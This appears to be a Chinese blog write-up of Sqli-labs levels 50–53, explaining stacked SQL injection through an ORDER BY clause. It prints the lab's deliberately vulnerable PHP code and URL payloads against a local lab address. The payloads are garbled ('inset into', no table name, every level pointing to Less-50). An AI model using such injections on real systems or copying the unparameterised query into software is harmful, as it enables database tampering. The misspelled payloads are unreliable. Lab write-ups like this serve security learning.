zoukankan      html  css  js  c++  java
  • SQL注入之Sqli-labs系列第五十关,第五十一关,第五十二关,第五十三关(ORDER BY堆叠注入)

    0x1第五十关

           源码中使用的mysqli_multi_query()函数,而之前使用的是mysqli_query(),区别在于mysqli_multi_query()可以执行多个sql语句,而mysqli_query()只能执行一个sql语句,那么我们此处就可以执行多个sql语句进行注入,也就是说的堆叠注入。

    $sql="SELECT * FROM users ORDER BY $id";
        /* execute multi query */
        if (mysqli_multi_query($con1, $sql))
        {
    
            ?>
            <center>
            <font color= "#00FF00" size="4">
            
            <table   border=1'>
            <tr>
                <th>&nbsp;ID&nbsp;</th>
                <th>&nbsp;USERNAME&nbsp;  </th>
                <th>&nbsp;PASSWORD&nbsp;  </th>
            </tr>
            </font>
            </font>
            <?php
                /* store first result set */
                if ($result = mysqli_store_result($con1))
                {
                    while($row = mysqli_fetch_row($result))
                    {
                        echo '<font color= "#00FF11" size="3">';        
                        echo "<tr>";
                        echo "<td>";
                        printf("%s", $row[0]);
                        echo "</td>";
                        echo "<td>";
                        printf("%s", $row[1]);
                        echo "</td>";
                        echo "<td>";
                        printf("%s", $row[2]);
                        echo "</td>";
                        echo "</tr>";
                        echo "</font>";
                        
                    }
                    
                }
        echo "</table>";
        }
    
        else
        {
            echo '<font color= "#FFFF00">';
            print_r(mysqli_error($con1));
            echo "</font>";  
        }
    }
    else
    {
        echo "Please input parameter as SORT with numeric value<br><br><br><br>";
        echo "<br><br><br>";
        echo '<img src="../images/Less-50.jpg" /><br>';    
    }
    源码

      方法和三十九关同样

    SQL语句:
    $sql="SELECT * FROM users ORDER BY $id";
    payload:
    http://192.168.232.135/sqli-labs-master/Less-50/?sort=1;inset into values(1000,'test','test')#  

    0x2 第五十一关

      同样的这关也是使用的mysqli_multi_query()函数,不同点在于sql语句

    SQL语句:
    $sql="SELECT * FROM users ORDER BY '$id'";
    payload:
    http://192.168.232.135/sqli-labs-master/Less-50/?sort=1';inset into values(2000,'test','test')#  

    0x3 第五十二关

    同样的这关和五十关一样也是使用的mysqli_multi_query()函数,不同点在于sql语句和没有报错信息

    SQL语句:
    $sql="SELECT * FROM users ORDER BY $id";
    payload:
    http://192.168.232.135/sqli-labs-master/Less-50/?sort=1;inset into values(3000,'test','test')#  

    0x4第五十三关

    同样的这关和五十一关一样也是使用的mysqli_multi_query()函数,不同点在于sql语句和没有报错信息

    SQL语句:
    $sql="SELECT * FROM users ORDER BY '$id'";
    payload:
    http://192.168.232.135/sqli-labs-master/Less-50/?sort=1';inset into values(4000,'test','test')#  
  • 相关阅读:
    python中os模块中文帮助
    TypeError: string indices must be integers, not str
    ValueError: multi-byte encodings are not supported
    Codeforces Round #620 (Div. 2)E(LCA求树上两点最短距离)
    Codeforces Round #620 (Div. 2)D(LIS,构造)
    Codeforces Round #619 (Div. 2)D(模拟)
    Codeforces Round #619 (Div. 2)C(构造,容斥)
    Educational Codeforces Round 82 (Rated for Div. 2)E(DP,序列自动机)
    Educational Codeforces Round 82 (Rated for Div. 2)D(模拟)
    【PAT甲级】1114 Family Property (25分)(并查集)
  • 原文地址:https://www.cnblogs.com/AmoBlogs/p/8725886.html
Copyright © 2011-2022 走看看